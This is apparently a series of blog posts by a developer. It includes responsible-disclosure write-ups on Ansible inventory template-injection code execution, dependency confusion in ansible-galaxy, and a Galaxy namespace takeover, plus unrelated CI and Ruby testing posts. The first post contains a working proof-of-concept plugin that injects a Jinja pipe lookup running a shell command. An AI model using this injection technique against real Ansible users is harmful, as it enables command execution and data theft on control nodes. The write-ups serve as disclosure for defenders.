Remote Code Execution in Ansible dynamic inventory plugins

I had reported this to Ansible a year ago (2023-02-23), but it seems this is considered expected behavior, so I am posting it here now.

TL;DR

Don't ever consume any data you got from an inventory if there is a chance somebody untrusted touched it.

Inventory plugins

Inventory plugins allow Ansible to pull inventory data from a variety of sources. The most common ones are probably the ones fetching instances from clouds like Amazon EC2 and Hetzner Cloud or the ones talking to tools like Foreman.

For Ansible to function, an inventory needs to tell Ansible how to connect to a host (so e.g. a network address) and which groups the host belongs to (if any). But it can also set any arbitrary variable for that host, which is often used to provide additional information about it. These can be tags in EC2, parameters in Foreman, and other arbitrary data someone thought would be good to attach to that object.

And this is where things are getting interesting. Somebody could add a comment to a host and that comment would be visible to you when you use the inventory with that host. And if that comment contains a Jinja expression, it might get executed. And if that Jinja expression is using the pipe lookup, it might get executed in your shell.

Let that sink in for a moment, and then we'll look at an example.

Example inventory plugin

from ansible.plugins.inventory import BaseInventoryPlugin

class InventoryModule(BaseInventoryPlugin):

    NAME = 'evgeni.inventoryrce.inventory'

    def verify_file(self, path):
        valid = False
        if super(InventoryModule, self).verify_file(path):
            if path.endswith('evgeni.yml'):
                valid = True
        return valid

    def parse(self, inventory, loader, path, cache=True):
        super(InventoryModule, self).parse(inventory, loader, path, cache)
        self.inventory.add_host('exploit.example.com')
        self.inventory.set_variable('exploit.example.com', 'ansible_connection', 'local')
        self.inventory.set_variable('exploit.example.com', 'something_funny', '{{ lookup("pipe", "touch /tmp/hacked" ) }}')

The code is mostly copy & paste from the Developing dynamic inventory docs for Ansible and does three things:

  1. defines the plugin name as evgeni.inventoryrce.inventory
  2. accepts any config that ends with evgeni.yml (we'll need that to trigger the use of this inventory later)
  3. adds an imaginary host exploit.example.com with local connection type and something_funny variable to the inventory

In reality this would be talking to some API, iterating over hosts known to it, fetching their data, etc. But the structure of the code would be very similar.

The crucial part is that if we have a string with a Jinja expression, we can set it as a variable for a host.

Using the example inventory plugin

Now we install the collection containing this inventory plugin, or rather write the code to ~/.ansible/collections/ansible_collections/evgeni/inventoryrce/plugins/inventory/inventory.py (or wherever your Ansible loads its collections from).

And we create a configuration file. As there is nothing to configure, it can be empty and only needs to have the right filename: touch inventory.evgeni.yml is all you need.

If we now call ansible-inventory, we'll see our host and our variable present:

% ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-inventory -i inventory.evgeni.yml --list
{
    "_meta": {
        "hostvars": {
            "exploit.example.com": {
                "ansible_connection": "local",
                "something_funny": "{{ lookup(\"pipe\", \"touch /tmp/hacked\" ) }}"
            }
        }
    },
    "all": {
        "children": [
            "ungrouped"
        ]
    },
    "ungrouped": {
        "hosts": [
            "exploit.example.com"
        ]
    }
}

(ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory is required to allow the use of our inventory plugin, as it's not in the default list.)

So far, nothing dangerous has happened. The inventory got generated, the host is present, the funny variable is set, but it's still only a string.

Executing a playbook, interpreting Jinja

To execute the code we'd need to use the variable in a context where Jinja is used. This could be a template where you actually use this variable, like a report where you print the comment the creator has added to a VM.

Or a debug task where you dump all variables of a host to analyze what's set. Let's use that!

- hosts: all
  tasks:
    - name: Display all variables/facts known for a host
      ansible.builtin.debug:
        var: hostvars[inventory_hostname]

This playbook looks totally innocent: run against all hosts and dump their hostvars using debug. No mention of our funny variable. Yet, when we execute it, we see:

% ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-playbook -i inventory.evgeni.yml test.yml
PLAY [all] ************************************************************************************************

TASK [Gathering Facts] ************************************************************************************
ok: [exploit.example.com]

TASK [Display all variables/facts known for a host] *******************************************************
ok: [exploit.example.com] => {
    "hostvars[inventory_hostname]": {
        "ansible_all_ipv4_addresses": [
            "192.168.122.1"
        ],

        "something_funny": ""
    }
}

PLAY RECAP *************************************************************************************************
exploit.example.com  : ok=2    changed=0    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   

We got all variables dumped, that was expected, but now something_funny is an empty string? Jinja got executed, and the expression was {{ lookup("pipe", "touch /tmp/hacked" ) }} and touch does not return anything. But it did create the file!

% ls -alh /tmp/hacked 
-rw-r--r--. 1 evgeni evgeni 0 Mar 10 17:18 /tmp/hacked

We just "hacked" the Ansible control node (aka: your laptop), as that's where lookup is executed. It could also have used the url lookup to send the contents of your Ansible vault to some internet host. Or connect to some VPN-secured system that should not be reachable from EC2/Hetzner/….

Why is this possible?

This happens because set_variable(entity, varname, value) doesn't mark the values as unsafe and Ansible processes everything with Jinja in it.

In this very specific example, a possible fix would be to explicitly wrap the string in AnsibleUnsafeText by using wrap_var:

from ansible.utils.unsafe_proxy import wrap_var

self.inventory.set_variable('exploit.example.com', 'something_funny', wrap_var('{{ lookup("pipe", "touch /tmp/hacked" ) }}'))

Which then gets rendered as a string when dumping the variables using debug:

"something_funny": "{{ lookup(\"pipe\", \"touch /tmp/hacked\" ) }}"

But it seems inventories don't do this:

for k, v in host_vars.items():
    self.inventory.set_variable(name, k, v)

(aws_ec2.py)

for key, value in hostvars.items():
    self.inventory.set_variable(hostname, key, value)

(hcloud.py)

for k, v in hostvars.items():
    try:
        self.inventory.set_variable(host_name, k, v)
    except ValueError as e:
        self.display.warning("Could not set host info hostvar for %s, skipping %s: %s" % (host, k, to_text(e)))

(foreman.py)

And honestly, I can totally understand that. When developing an inventory, you do not expect to handle insecure input data. You also expect the API to handle the data in a secure way by default. But set_variable doesn't allow you to tag data as "safe" or "unsafe" easily and data in Ansible defaults to "safe".

Can something similar happen in other parts of Ansible?

It certainly happened in the past that Jinja was abused in Ansible: CVE-2016-9587, CVE-2017-7466, CVE-2017-7481

But even if we only look at inventories, add_host(host) can be abused in a similar way:

from ansible.plugins.inventory import BaseInventoryPlugin

class InventoryModule(BaseInventoryPlugin):

    NAME = 'evgeni.inventoryrce.inventory'

    def verify_file(self, path):
        valid = False
        if super(InventoryModule, self).verify_file(path):
            if path.endswith('evgeni.yml'):
                valid = True
        return valid

    def parse(self, inventory, loader, path, cache=True):
        super(InventoryModule, self).parse(inventory, loader, path, cache)
        self.inventory.add_host('lol{{ lookup("pipe", "touch /tmp/hacked-host" ) }}')
% ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-playbook -i inventory.evgeni.yml test.yml
PLAY [all] ************************************************************************************************

TASK [Gathering Facts] ************************************************************************************
fatal: [lol{{ lookup("pipe", "touch /tmp/hacked-host" ) }}]: UNREACHABLE! => {"changed": false, "msg": "Failed to connect to the host via ssh: ssh: Could not resolve hostname lol: No address associated with hostname", "unreachable": true}

PLAY RECAP ************************************************************************************************
lol{{ lookup("pipe", "touch /tmp/hacked-host" ) }} : ok=0    changed=0    unreachable=1    failed=0    skipped=0    rescued=0    ignored=0

% ls -alh /tmp/hacked-host
-rw-r--r--. 1 evgeni evgeni 0 Mar 13 08:44 /tmp/hacked-host

Affected versions

I've tried this on Ansible (core) 2.13.13 and 2.16.4. I'd totally expect older versions to be affected too, but I have not verified that.

Running autopkgtest with Docker inside Docker

While I am not the biggest fan of Docker, I must admit it has quite some reach across various service providers and can often be seen as an API for running things in isolated environments.

One such service provider is GitHub when it comes to their Actions service.

I have no idea what isolation technology GitHub uses on the outside of Actions, but inside you just get an Ubuntu system and can run whatever you want via Docker as that comes pre-installed and pre-configured. This especially means you can run things inside vanilla Debian containers, that are free from any GitHub or Canonical modifications one might not want ;-)

So, if you want to run, say, lintian from sid, you can define a job to do so:

  lintian:
    runs-on: ubuntu-latest
    container: debian:sid
    steps:
      - [ do something to get a package to run lintian on ]
      - run: apt-get update
      - run: apt-get install -y --no-install-recommends lintian
      - run: lintian --info --display-info *.changes

This will run on Ubuntu (latest right now means 22.04 for GitHub), but then use Docker to run the debian:sid container and execute all further steps inside it. Pretty short and straight forward, right?

Now lintian does static analysis of the package, it doesn't need to install it. What if we want to run autopkgtest that performs tests on an actually installed package?

autopkgtest comes with various "virt servers", which are providing isolation of the testbed, so that it does not interfere with the host system. The simplest available virt server, autopkgtest-virt-null doesn't actually provide any isolation, as it runs things directly on the host system. This might seem fine when executed inside an ephemeral container in an CI environment, but it also means that multiple tests have the potential to influence each other as there is no way to revert the testbed to a clean state. For that, there are other, "real", virt servers available: chroot, lxc, qemu, docker and many more. They all have one in common: to use them, one needs to somehow provide an "image" (a prepared chroot, a tarball of a chroot, a vm disk, a container, …, you get it) to operate on and most either bring a tool to create such an "image" or rely on a "registry" (online repository) to provide them.

Most users of autopkgtest on GitHub (that I could find with their terrible search) are using either the null or the lxd virt servers. Probably because these are dead simple to set up (null) or the most "native" (lxd) in the Ubuntu environment.

As I wanted to execute multiple tests that for sure would interfere with each other, the null virt server was out of the discussion pretty quickly.

The lxd one also felt odd, as that meant I'd need to set up lxd (can be done in a few commands, but still) and it would need to download stuff from Canonical, incurring costs (which I couldn't care less about) and taking time which I do care about!).

Enter autopkgtest-virt-docker, which recently was added to autopkgtest! No need to set things up, as GitHub already did all the Docker setup for me, and almost no waiting time to download the containers, as GitHub does heavy caching of stuff coming from Docker Hub (or at least it feels like that).

The only drawback? It was added in autopkgtest 5.23, which Ubuntu 22.04 doesn't have. "We need to go deeper" and run autopkgtest from a sid container!

With this idea, our current job definition would look like this:

  autopkgtest:
    runs-on: ubuntu-latest
    container: debian:sid
    steps:
      - [ do something to get a package to run autopkgtest on ]
      - run: apt-get update
      - run: apt-get install -y --no-install-recommends autopkgtest autodep8 docker.io
      - run: autopkgtest *.changes --setup-commands="apt-get update" -- docker debian:sid

(--setup-commands="apt-get update" is needed as the container comes with an empty apt cache and wouldn't be able to find dependencies of the tested package)

However, this will fail:

# autopkgtest *.changes --setup-commands="apt-get update" -- docker debian:sid
autopkgtest [10:20:54]: starting date and time: 2023-04-07 10:20:54+0000
autopkgtest [10:20:54]: version 5.28
autopkgtest [10:20:54]: host a82a11789c0d; command line:
  /usr/bin/autopkgtest bley_2.0.0-1_amd64.changes '--setup-commands=apt-get update' -- docker debian:sid
Unexpected error:
Traceback (most recent call last):
  File "/usr/share/autopkgtest/lib/VirtSubproc.py", line 829, in mainloop
    command()
  File "/usr/share/autopkgtest/lib/VirtSubproc.py", line 758, in command
    r = f(c, ce)
        ^^^^^^^^
  File "/usr/share/autopkgtest/lib/VirtSubproc.py", line 692, in cmd_copydown
    copyupdown(c, ce, False)
  File "/usr/share/autopkgtest/lib/VirtSubproc.py", line 580, in copyupdown
    copyupdown_internal(ce[0], c[1:], upp)
  File "/usr/share/autopkgtest/lib/VirtSubproc.py", line 607, in copyupdown_internal
    copydown_shareddir(sd[0], sd[1], dirsp, downtmp_host)
  File "/usr/share/autopkgtest/lib/VirtSubproc.py", line 562, in copydown_shareddir
    shutil.copy(host, host_tmp)
  File "/usr/lib/python3.11/shutil.py", line 419, in copy
    copyfile(src, dst, follow_symlinks=follow_symlinks)
  File "/usr/lib/python3.11/shutil.py", line 258, in copyfile
    with open(dst, 'wb') as fdst:
         ^^^^^^^^^^^^^^^
FileNotFoundError: [Errno 2] No such file or directory: '/tmp/autopkgtest-virt-docker.shared.kn7n9ioe/downtmp/wrapper.sh'
autopkgtest [10:21:07]: ERROR: testbed failure: unexpected eof from the testbed

Running the same thing locally of course works, so there has to be something special about the setup at GitHub. But what?!

A bit of digging revealed that autopkgtest-virt-docker tries to use a shared directory (using Dockers --volume) to exchange things with the testbed (for the downtmp-host capability). As my autopkgtest is running inside a container itself, nothing it tells the Docker deamon to mount will be actually visible to it.

In retrospect this makes total sense and autopkgtest-virt-docker has a switch to "fix" the issue: --remote as the Docker deamon is technically remote when viewed from the place autopkgtest runs at.

I'd argue this is not a bug in autopkgtest(-virt-docker), as the situation is actually cared for. There is even some auto-detection of "remote" daemons in the code, but that doesn't "know" how to detect the case where the daemon socket is mounted (vs being set as an environment variable). I've opened an MR (assume remote docker when running inside docker) which should detect the case of running inside a Docker container which kind of implies the daemon is remote.

Not sure the patch will be accepted (it is a band-aid after all), but in the meantime I am quite happy with using --remote and so could you ;-)

The Mocking will continue, until CI improves

One might think, this blog is exclusively about weird language behavior and yelling at computers… Well, welcome to another episode of Jackass!

Today's opponent is Ruby, or maybe minitest , or maybe Mocha. I'm not exactly sure, but it was a rather amusing exercise and I like to share my nightmares ;)

It all started with the classical "you're using old and unmaintained software, please switch to something new".

The first attempt was to switch from the ci_reporter_minitest plugin to the minitest-ci plugin. While the change worked great for Foreman itself, it broke the reporting in Katello - the tests would run but no junit.xml was generated and Jenkins rightfully complained that it got no test results.

While investigating what the hell was wrong, we realized that Katello was already using a minitest reporting plugin: minitest-reporters. Loading two different reporting plugins seemed like a good source for problems, so I tried using the same plugin for Foreman too.

Guess what? After a bit of massaging (mostly to disable the second minitest-reporters initialization in Katello) reporting of test results from Katello started to work like a charm. But now the Foreman tests started to fail. Not fail to report, fail to actually run. WTH‽

The failure was quite interesting too:

test/unit/parameter_filter_test.rb:5:in `block in <class:ParameterFilterTest>':
  Mocha methods cannot be used outside the context of a test (Mocha::NotInitializedError)

Yes, this is a single test file failing, all others were fine.

The failing code doesn't look problematic on first glance:

require 'test_helper'

class ParameterFilterTest < ActiveSupport::TestCase
  let(:klass) do
    mock('Example').tap do |k|
      k.stubs(:name).returns('Example')
    end
  end

  test 'something' do
    something
  end
end

The failing line (5) is mock('Example').tap … and for some reason Mocha thinks it's not initialized here.

This certainly has something to do with how the various reporting plugins inject themselves, but I really didn't want to debug how to run two reporting plugins in parallel (which, as you remember, didn't expose this behavior). So the only real path forward was to debug what's happening here.

Calling the test on its own, with one of the working reporter was the first step:

$ bundle exec rake test TEST=test/unit/parameter_filter_test.rb TESTOPTS=-v

#<Mocha::Mock:0x0000557bf1f22e30>#test_0001_permits plugin-added attribute = 0.04 s = .
#<Mocha::Mock:0x0000557bf12cf750>#test_0002_permits plugin-added attributes from blocks = 0.49 s = .

Wait, what? #<Mocha::Mock:…>? Shouldn't this read more like ParameterFilterTest::… as it happens for every single other test in our test suite? It definitely should! That's actually great, as it tells us that there is really something wrong with the test and the change of the reporting plugin just makes it worse.

What comes next is sheer luck. Well, that, and years of experience in yelling at computers.

We use let(:klass) to define an object called klass and this object is a Mocha::Mock that we'll use in our tests later. Now klass is a very common term in Ruby when talking about classes and needing to store them — mostly because one can't use class which is a keyword. Is something else in the stack using klass and our let is overriding that, making this whole thing explode?

It was! The moment we replaced klass with klass1 (silly, I know, but there also was a klass2 in that code, so it did fit), things started to work nicely.

I really liked Tomer's comment in the PR: "no idea why, but I am not going to dig into mocha to figure that out."

Turns out, I couldn't let (HAH!) the code rest and really wanted to understand what happened there.

What I didn't want to do is to debug the whole Foreman test stack, because it is massive.

So I started to write a minimal reproducer for the issue.

All starts with a Gemfile, as we need a few dependencies:

gem 'rake'
gem 'mocha'
gem 'minitest', '~> 5.1', '< 5.11'

Then a Rakefile:

require 'rake/testtask'

Rake::TestTask.new(:test) do |t|
  t.libs << 'test'
  t.test_files = FileList["test/**/*_test.rb"]
end

task :default => :test

And a test! I took the liberty to replace ActiveSupport::TestCase with Minitest::Test, as the test won't be using any Rails features and I wanted to keep my environment minimal.

require 'minitest/autorun'
require 'minitest/spec'
require 'mocha/minitest'

class ParameterFilterTest < Minitest::Test
  extend Minitest::Spec::DSL

  let(:klass) do
    mock('Example').tap do |k|
      k.stubs(:name).returns('Example')
    end
  end

  def test_lol
    assert klass
  end
end

Well, damn, this passed! Is it Rails after all that breaks stuff? Let's add it to the Gemfile!

$ vim Gemfile
$ bundle install
$ bundle exec rake test TESTOPTS=-v

#<Mocha::Mock:0x0000564bbfe17e98>#test_lol = 0.00 s = .

Wait, I didn't change anything and it's already failing?! Fuck! I mean, cool!

But the test isn't minimal yet. What can we reduce? let is just a fancy, lazy def, right? So instead of let(:klass) we should be able to write def klass and achieve a similar outcome and drop that Minitest::Spec.

require 'minitest/autorun'
require 'mocha/minitest'

class ParameterFilterTest < Minitest::Test
  def klass
    mock
  end

  def test_lol
    assert klass
  end
end
$ bundle exec rake test TESTOPTS=-v

/home/evgeni/Devel/minitest-wtf/test/parameter_filter_test.rb:5:in `klass': Mocha methods cannot be used outside the context of a test (Mocha::NotInitializedError)
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/railties-6.1.4.1/lib/rails/test_unit/reporter.rb:68:in `format_line'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/railties-6.1.4.1/lib/rails/test_unit/reporter.rb:15:in `record'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:682:in `block in record'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:681:in `each'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:681:in `record'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:324:in `run_one_method'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:311:in `block (2 levels) in run'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:310:in `each'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:310:in `block in run'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:350:in `on_signal'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:337:in `with_info_handler'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:309:in `run'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:159:in `block in __run'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:159:in `map'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:159:in `__run'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:136:in `run'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:63:in `block in autorun'
rake aborted!

Oh nice, this is even better! Instead of the mangled class name, we now get the very same error the Foreman tests aborted with, plus a nice stack trace! But wait, why is it pointing at railties? We're not loading that! Anyways, lets look at railties-6.1.4.1/lib/rails/test_unit/reporter.rb, line 68

def format_line(result)
  klass = result.respond_to?(:klass) ? result.klass : result.class
  "%s#%s = %.2f s = %s" % [klass, result.name, result.time, result.result_code]
end

Heh, this is touching result.klass, which we just messed up. Nice!

But quickly back to railties… What if we only add that to the Gemfile, not full blown Rails?

gem 'railties'
gem 'rake'
gem 'mocha'
gem 'minitest', '~> 5.1', '< 5.11'

Yepp, same failure. Also happens with require => false added to the line, so it seems railties somehow injects itself into rake even if nothing is using it?! "Cool"!

By the way, why are we still pinning minitest to < 5.11? Oh right, this was the original reason to look into that whole topic. And, uh, it's pointing at klass there already! 4 years ago!

So lets remove that boundary and funny enough, now tests are passing again, even if we use klass!

Minitest 5.11 changed how Minitest::Test is structured, and seems not to rely on klass at that point anymore. And I guess Rails also changed a bit since the original pin was put in place four years ago.

I didn't want to go another rabbit hole, finding out what changed in Rails, but I did try with 5.0 (well, 5.0.7.2) to be precise, and the output with newer (>= 5.11) Minitest was interesting:

$ bundle exec rake test TESTOPTS=-v

Minitest::Result#test_lol = 0.00 s = .

It's leaking Minitest::Result as klass now, instead of Mocha::Mock. So probably something along these lines was broken 4 years ago and triggered this pin.

What do we learn from that?

  • klass is cursed and shouldn't be used in places where inheritance and tooling might decide to use it for some reason
  • inheritance is cursed - why the heck are implementation details of Minitest leaking inside my tests?!
  • tooling is cursed - why is railties injecting stuff when I didn't ask it to?!
  • dependency pinning is cursed - at least if you pin to avoid an issue and then forget about said issue for four years
  • I like cursed things!

Dependency confusion in the Ansible Galaxy CLI

I hope you enjoyed my last post about Ansible Galaxy Namespaces. In there I noted that I originally looked for something completely different and the namespace takeover was rather accidental.

Well, originally I was looking at how the different Ansible content hosting services and their client (ansible-galaxy) behave in regard to clashes in naming of the hosted content.

"Ansible content hosting services"?! There are currently three main ways for users to obtain Ansible content:

  • Ansible Galaxy - the original, community oriented, free hosting platform
  • Automation Hub - the place for Red Hat certified and supported content, available only with a Red Hat subscription, hosted by Red Hat
  • Ansible Automation Platform - the on-premise version of Automation Hub, syncs content from there and allows customers to upload own content

Now the question I was curious about was: how would the tooling behave if different sources would offer identically named content?

This was inspired by Alex Birsan: Dependency Confusion: How I Hacked Into Apple, Microsoft and Dozens of Other Companies and zofrex: Bundler is Still Vulnerable to Dependency Confusion Attacks (CVE⁠-⁠2020⁠-⁠36327), who showed that the tooling for Python, Node.js and Ruby can be tricked into fetching content from "the wrong source", thus allowing an attacker to inject malicious code into a deployment.

For the rest of this article, it's not important that there are different implementations of the hosting services, only that users can configure and use multiple sources at the same time.

The problem is that, if the user configures their server_list to contain multiple Galaxy-compatible servers, like Ansible Galaxy and Automation Hub, and then asks to install a collection, the Ansible Galaxy CLI will ask every server in the list, until one returns a successful result. The exact order seems to differ between versions, but this doesn't really matter for the issue at hand.

Imagine someone wants to install the redhat.satellite collection from Automation Hub (using ansible-galaxy collection install redhat.satellite). Now if their configuration defines Galaxy as the first, and Automation Hub as the second server, Galaxy is always asked whether it has redhat.satellite and only if the answer is negative, Automation Hub is asked. Today there is no redhat namespace on Galaxy, but there is a redhat user on GitHub, so…

The canonical answer to this issue is to use a requirements.yml file and setting the source parameter. This parameter allows you to express "regardless which sources are configured, please fetch this collection from here". That's is nice, but I think this not being the default syntax (contrary to what e.g. Bundler does) is a bad approach. Users might overlook the security implications, as the shorter syntax without the source just "magically" works.

However, I think this is not even the main problem here. The documentation says: Once a collection is found, any of its requirements are only searched within the same Galaxy instance as the parent collection. The install process will not search for a collection requirement in a different Galaxy instance. But as it turns out, the source behavior was changed and now only applies to the exact collection it is set for, not for any dependencies this collection might have.

For the sake of the example, imagine two collections: evgeni.test1 and evgeni.test2, where test2 declares a dependency on test1 in its galaxy.yml. Actually, no need to imagine, both collections are available in version 1.0.0 from galaxy.ansible.com and test1 version 2.0.0 is available from galaxy-dev.ansible.com.

Now, given our recent reading of the docs, we craft the following requirements.yml:

collections:
- name: evgeni.test2
  version: '*'
  source: https://galaxy.ansible.com

In a perfect world, following the documentation, this would mean that both collections are fetched from galaxy.ansible.com, right? However, this is not what ansible-galaxy does. It will fetch evgeni.test2 from the specified source, determine it has a dependency on evgeni.test1 and fetch that from the "first" available source from the configuration.

Take for example the following ansible.cfg:

[galaxy]
server_list = test_galaxy, release_galaxy, test_galaxy

[galaxy_server.release_galaxy]
url=https://galaxy.ansible.com/

[galaxy_server.test_galaxy]
url=https://galaxy-dev.ansible.com/

And try to install collections, using the above requirements.yml:

% ansible-galaxy collection install -r requirements.yml -vvv                 
ansible-galaxy 2.9.27
  config file = /home/evgeni/Devel/ansible-wtf/collections/ansible.cfg
  configured module search path = ['/home/evgeni/.ansible/plugins/modules', '/usr/share/ansible/plugins/modules']
  ansible python module location = /usr/lib/python3.10/site-packages/ansible
  executable location = /usr/bin/ansible-galaxy
  python version = 3.10.0 (default, Oct  4 2021, 00:00:00) [GCC 11.2.1 20210728 (Red Hat 11.2.1-1)]
Using /home/evgeni/Devel/ansible-wtf/collections/ansible.cfg as config file
Reading requirement file at '/home/evgeni/Devel/ansible-wtf/collections/requirements.yml'
Found installed collection theforeman.foreman:3.0.0 at '/home/evgeni/.ansible/collections/ansible_collections/theforeman/foreman'
Process install dependency map
Processing requirement collection 'evgeni.test2'
Collection 'evgeni.test2' obtained from server explicit_requirement_evgeni.test2 https://galaxy.ansible.com/api/
Opened /home/evgeni/.ansible/galaxy_token
Processing requirement collection 'evgeni.test1' - as dependency of evgeni.test2
Collection 'evgeni.test1' obtained from server test_galaxy https://galaxy-dev.ansible.com/api
Starting collection install process
Installing 'evgeni.test2:1.0.0' to '/home/evgeni/.ansible/collections/ansible_collections/evgeni/test2'
Downloading https://galaxy.ansible.com/download/evgeni-test2-1.0.0.tar.gz to /home/evgeni/.ansible/tmp/ansible-local-133/tmp9uqyjgki
Installing 'evgeni.test1:2.0.0' to '/home/evgeni/.ansible/collections/ansible_collections/evgeni/test1'
Downloading https://galaxy-dev.ansible.com/download/evgeni-test1-2.0.0.tar.gz to /home/evgeni/.ansible/tmp/ansible-local-133/tmp9uqyjgki

As you can see, evgeni.test1 is fetched from galaxy-dev.ansible.com, instead of galaxy.ansible.com. Now, if those servers instead would be Galaxy and Automation Hub, and somebody managed to snag the redhat namespace on Galaxy, I would be now getting the wrong stuff… Another problematic setup would be with Galaxy and on-prem Ansible Automation Platform, as you can have any namespace on the later and these most certainly can clash with namespaces on public Galaxy.

I have reported this behavior to Ansible Security on 2021-08-26, giving a 90 days disclosure deadline, which expired on 2021-11-24.

So far, the response was that this is working as designed, to allow cross-source dependencies (e.g. a private collection referring to one on Galaxy) and there is an issue to update the docs to match the code. If users want to explicitly pin sources, they are supposed to name all dependencies and their sources in requirements.yml. Alternatively they obviously can configure only one source in the configuration and always mirror all dependencies.

I am not happy with this and I think this is terrible UX, explicitly inviting people to make mistakes.

Getting access to somebody else's Ansible Galaxy namespace

TL;DR: adding features after the fact is hard, normalizing names is hard, it's patched, carry on.

I promise, the longer version is more interesting and fun to read!

Recently, I was poking around Ansible Galaxy and almost accidentally got access to someone else's namespace. I was actually looking for something completely different, but accidental finds are the best ones!

If you're asking yourself: "what the heck is he talking about?!", let's slow down for a moment:

  • Ansible is a great automation engine built around the concept of modules that do things (mostly written in Python) and playbooks (mostly written in YAML) that tell which things to do
  • Ansible Galaxy is a place where people can share their playbooks and modules for others to reuse
  • Galaxy Namespaces are a way to allow users to distinguish who published what and reduce name clashes to a minimum

That means that if I ever want to share how to automate installing vim, I can publish evgeni.vim on Galaxy and other people can download that and use it. And if my evil twin wants their vim recipe published, it will end up being called evilme.vim. Thus while both recipes are called vim they can coexist, can be downloaded to the same machine, and used independently.

How do you get a namespace? It's automatically created for you when you login for the first time. After that you can manage it, you can upload content, allow others to upload content and other things. You can also request additional namespaces, this is useful if you want one for an Organization or similar entities, which don't have a login for Galaxy.

Apropos login, Galaxy uses GitHub for authentication, so you don't have to store yet another password, just smash that octocat!

Did anyone actually click on those links above? If you did (you didn't, right?), you might have noticed another section in that document: Namespace Limitations. That says:

Namespace names in Galaxy are limited to lowercase word characters (i.e., a-z, 0-9) and ‘_’, must have a minimum length of 2 characters, and cannot start with an ‘_’. No other characters are allowed, including ‘.’, ‘-‘, and space. The first time you log into Galaxy, the server will create a Namespace for you, if one does not already exist, by converting your username to lowercase, and replacing any ‘-‘ characters with ‘_’.

For my login evgeni this is pretty boring, as the generated namespace is also evgeni. But for the GitHub user Evil-Pwnwil-666 it will become evil_pwnwil_666. This can be a bit confusing.

Another confusing thing is that Galaxy supports two types of content: roles and collections, but namespaces are only for collections! So it is Evil-Pwnwil-666.vim if it's a role, but evil_pwnwil_666.vim if it's a collection.

I think part of this split is because collections were added much later and have a much more well thought design of both the artifact itself and its delivery mechanisms.

This is by the way very important for us! Due to the fact that collections (and namespaces!) were added later, there must be code that ensures that users who were created before also get a namespace.

Galaxy does this (and I would have done it the same way) by hooking into the login process, and after the user is logged in it checks if a Namespace exists and if not it creates one and sets proper permissions.

And this is also exactly where the issue was!

The old code looked like this:

    # Create lowercase namespace if case insensitive search does not find match
    qs = models.Namespace.objects.filter(
        name__iexact=sanitized_username).order_by('name')
    if qs.exists():
        namespace = qs[0]
    else:
        namespace = models.Namespace.objects.create(**ns_defaults)

    namespace.owners.add(user)

See how namespace.owners.add is always called? Even if the namespace already existed? Yepp!

But how can we exploit that? Any user either already has a namespace (and owns it) or doesn't have one that could be owned. And given users are tied to GitHub accounts, there is no way to confuse Galaxy here. Now, remember how I said one could request additional namespaces, for organizations and stuff? Those will have owners, but the namespace name might not correspond to an existing user!

So all we need is to find an existing Galaxy namespace that is not a "default" namespace (aka a specially requested one) and get a GitHub account that (after the funny name conversion) matches the namespace name.

Thankfully Galaxy has an API, so I could dump all existing namespaces and their owners. Next I filtered that list to have only namespaces where the owner list doesn't contain a username that would (after conversion) match the namespace name. I found a few. And for one of them (let's call it the_target), the corresponding GitHub username (the-target) was available! Jackpot!

I've registered a new GitHub account with that name, logged in to Galaxy and had access to the previously found namespace.

This felt like sufficient proof that my attack worked and I mailed my findings to the Ansible Security team. The issue was fixed in d4f84d3400f887a26a9032687a06dd263029bde3 by moving the namespace.owners.add call to the "new namespace" branch.

And this concludes the story of how I accidentally got access to someone else's Galaxy namespace (which was revoked after the report, no worries).

A String is not a String, and that's Groovy!

Halloween is over, but I still have some nightmares to share with you, so sit down, take some hot chocolate and enjoy :)

When working with Jenkins, there is almost no way to avoid writing Groovy. Well, unless you only do old style jobs with shell scripts, but y'all know what I think about shell scripts…

Anyways, Eric have been rewriting the jobs responsible for building Debian packages for Foreman to pipelines (and thus Groovy).

Our build process for pull requests is rather simple:

  1. Setup sources - get the orig tarball and adjust changelog to have an unique version for pull requests
  2. Call pbuilder
  3. Upload the built package to a staging archive for testing

For merges, it's identical, minus the changelog adjustment.

And if there are multiple packages changed in one go, it runs each step in parallel for each package.

